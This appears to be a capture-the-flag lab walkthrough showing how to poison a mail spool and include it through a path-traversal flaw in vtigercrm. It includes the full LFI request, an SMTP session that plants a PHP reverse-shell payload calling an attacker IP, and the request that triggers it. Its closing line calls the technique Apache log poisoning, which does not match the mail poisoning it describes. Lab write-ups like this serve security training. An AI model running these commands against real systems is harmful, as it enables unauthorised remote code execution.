Mail log

Example from 10.10.10.7

Since this server has a port 25 SMTP running we can take advantage of of this feature to see if we can "poison" the /var/mail*user* mail. In order for this attack to succeed, application we are exploiting with LFI needs to have an access to this file. In this we can see below that we can read mail of the user asterisk.

└──╼ $curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00
From asterisk@beep.localdomain Mon Jan 28 21:04:02 2019
Return-Path: <asterisk@beep.localdomain>
X-Original-To: asterisk
Delivered-To: asterisk@beep.localdomain
Received: by beep.localdomain (Postfix, from userid 100)
id 1BBB2D9301; Mon, 28 Jan 2019 21:04:02 +0200 (EET)
From: root@beep.localdomain (Cron Daemon)
To: asterisk@beep.localdomain
Subject: Cron <asterisk@beep> /var/lib/asterisk/bin/freepbx-cron-scheduler.php
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/var/lib/asterisk>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=asterisk>
X-Cron-Env: <USER=asterisk>
Message-Id: <20190128190402.1BBB2D9301@beep.localdomain>
Date: Mon, 28 Jan 2019 21:02:01 +0200 (EET)
Mon, 28 Jan 2019 21:02:01 +0200 - Got event.. fullybooted
Mon, 28 Jan 2019 21:02:01 +0200 - No event handler for event 'fullybooted'
From asterisk@beep.localdomain Tue Jan 29 21:04:01 2019
Return-Path: <asterisk@beep.localdomain>
X-Original-To: asterisk
Delivered-To: asterisk@beep.localdomain

By connecting to SMTP server we can also send a php code with the hopes of the server executing it. In this case we have send the mail to the user asterisk, with the body containing instructions for reverse shell:

└──╼ $telnet 10.10.10.7 25
Trying 10.10.10.7...
Connected to 10.10.10.7.
Escape character is '^]'.
220 beep.localdomain ESMTP Postfix
EHLO me
250-beep.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
mail from: raf@pwned.com
250 2.1.0 Ok
rcpt to: asterisk@localhost
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1'");?>
.
250 2.0.0 Ok: queued as 399A4D9301
quit
221 2.0.0 Bye
Connection closed by foreign host.

Since the mail has been sent, all we need to do to test out our theory is to send GET request once again to the below address to trigger the shell: ( if successful the GET request will hang )

curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00

Successful reverse shell through Apache log poisoning: